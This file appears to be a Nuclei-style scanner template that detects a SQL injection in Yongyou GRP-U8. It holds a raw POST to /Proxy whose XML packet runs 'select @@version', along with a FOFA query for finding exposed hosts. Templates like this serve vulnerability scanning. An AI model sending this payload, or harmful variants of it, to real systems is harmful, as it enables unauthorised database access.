id: yongyou-grp-sqli

info:
  name: Yongyou GRP-U8 Sqli
  author: zp857
  severity: critical
  tags: yongyou,lfi
  metadata:
    fofa-query: 'body="GRP" || body="u8" || body="R9iPortal/js/jquery.js"'

requests:
  - raw:
      - |
        GET /services/userInfoWeb HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /Proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "userInfoWeb"
          - "Microsoft"

      - type: status
        status:
          - 200